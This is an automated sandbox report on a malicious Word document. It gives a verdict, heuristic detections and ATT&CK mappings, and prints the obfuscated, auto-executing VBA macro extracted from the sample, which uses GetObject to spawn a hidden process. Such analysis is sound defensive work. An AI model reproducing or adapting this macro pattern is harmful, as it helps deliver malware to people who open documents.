Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The macro utilizes the AutoOpen function and the GetObject call, which are common indicators of malicious activity. The presence of these elements strongly suggests an attempt to execute arbitrary code, likely to download and run a secondary payload.
Heuristics (7)
- ClamAV: Doc.Malware.00536d-6904394-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6904394-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11061 bytes |

SHA-256: 50b036633bae3345acecdcf08bf5d6114bedceaa379dbf2c083953087fdf5a5e

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "iQAoZAAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ToBQAQAU"
Attribute VB_Base = "0{51E7B197-7237-49D0-8E12-9D4F33F51C38}{C1FE6852-1F98-4CBC-AA30-83EF6529269E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "F_AwBA"
Sub autoopen()
On Error Resume Next
If bUAGoZB = RAG1DoA Then
JACAxk = (710457559)
cA1AA_ = (wAkQxUA * Log(234176360 + Atn(265125248 * RABwQk)) + XUGkCAAx + CDbl(BQXXAC - Sqr(WAGQBAB / CBool(403487077 / 790890056) + rQwkQGoA - Rnd(BUDDXw))) * 764328624 * 109473798)
vUkGAwC = (119548777)
End If
If JA1cQAk = RADDAAAk Then
oDUBAQQw = (756835792)
TXAAwU = (bQZA_kQ * Log(563522477 + Atn(897508302 * wAGGCA_A)) + zADxBC + CDbl(WZAQQU - Sqr(wwUAwA / CBool(730548565 / 937442634) + kQkBQc - Rnd(bUkkAX))) * 182487739 * 545345512)
TAACUGUw = (719535755)
End If
Set cxkADA = GetObject(EAA1ADA + ToBQAQAU.TkBGQ4D + YA4XBkAA)
If H1xQcGA = PAUAUkQ1 Then
SkAB_B = (285702528)
z4DA_xQ = (r1k1AAA * Log(626390355 + Atn(149629213 * FQBcZkDU)) + wUxwAAC + CDbl(BCAA_xAD - Sqr(bBUBAUw / CBool(764558718 / 378496997) + jAABAB - Rnd(vBDQwU))) * 951609534 * 772194350)
z4ADAXU = (246719815)
End If
If jABcAX = AAAAAwo_ Then
R4oQAo = (665634783)
uDDcABD = (IAAkoB * Log(762470668 + Atn(212658891 * tAoCAk)) + NDDCADG + CDbl(hBcDQcA - Sqr(DwUAQxDD / CBool(215923357 / 76587700) + jBAAkkA - Rnd(kAo_kDQw))) * 332239278 * 433924401)
CAQoXAA = (600683028)
End If
If ZA_Dc1A = CQAxAAZA Then
KBDUAA = (768959014)
IAAc1B = (VCQGQA * Log(511043833 + Atn(158982383 * wGACUAB)) + VAADwUAU + CDbl(d4_UQDU - Sqr(hUBBAAQ / CBool(201061409 / 447957769) + Zk_A_AQB - Rnd(mQxA_o))) * 509950142 * 283120311)
AwUXABDB = (347885851)
End If
cxkADA.ShowWindow = 796713 - 796713
If dAAk1k = YDAZABxU Then
DZA_cCCQ = (400346871)
hAZUQAQ = (UBAAAZ1o * Log(795585158 + Atn(889226940 * p4BCDD)) + KQUZAAAB + CDbl(jZUwZZB4 - Sqr(hAAZXUo / CBool(554761292 / 643721005) + pABB4B - Rnd(q4_AAwAQ))) * 559988833 * 87661382)
nwAAAA = (195148856)
End If
If WXGUZD = IACcAB1 Then
wDxX_AAU = (321982358)
rCAo4DGX = (VZADCB * Log(801773299 + Atn(23713028 * FAA1ow)) + BZcXCUAw + CDbl(TUoDBA - Sqr(jkQ1DDQ / CBool(28398717 / 577525272) + BxUDUXAx - Rnd(jAADAAA))) * 226843297 * 7688389)
lAQBAAk = (629637192)
End If
GetObject(TXAAoXBA + ToBQAQAU.QBZDAZG + lUAoXwB). _
Create@ s1_1DUB + ToBQAQAU.aAAABC + WBGBxBwA + ToBQAQAU.P4A4AG + R_GAXG + ToBQAQAU.PDGQ1Gw + JocAwo, hAo1A1, cxkADA, LAcoGX
If zXcQGQD = wZA_QQG Then
hxAwUZG = (570384162)
F1AQUA = (M4wDUAA * Log(407835625 + Atn(304222552 * SB4AQAA)) + Y_oDAAAD + CDbl(RwGAAXUQ - Sqr(Y1XGcGA / CBool(488489582 / 230218335) + iZDAQU - Rnd(CkGBDAD))) * 682638485 * 314394870)
UUAA1X1X = (106574424)
End If
If qCXGGU = wDAUGQB Then
zGD4Bk = (932955277)
t_GUxA_G = (YABwAAxQ * Log(493076800 + Atn(720779727 * UUZxA_)) + qABUQ_o1 + CDbl(MxABAxU - Sqr(sBBADCGA / CBool(252109750 / 189680532) + zDQAX4 - Rnd(soAXC_AA))) * 548380720 * 474016275)
JUUAABX = (745664000)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/bd0cdd2ef6624ef2b9826170024317bb.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iQAoZAAQ - 1106 bytes
' Macros/VBA/ToBQAQAU - 1158 bytes
' Macros/VBA/F_AwBA - 5308 bytes
' Line #0:
' FuncDefn (Sub F_AwBA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld bUAGoZB
' Eq
' IfBlock
' Line #3:
' LitDI4 0xB8D7 0x2A58
' Paren
' St RAG1DoA
' Line #4:
' Ld cA1AA_
' LitDI4 0x3F68 0x0DF5
' LitDI4 0x7D80 0x0FCD
' Ld wAkQxUA
' Mul
' ArgsLd Atn 0x0001
' Add
... (truncated)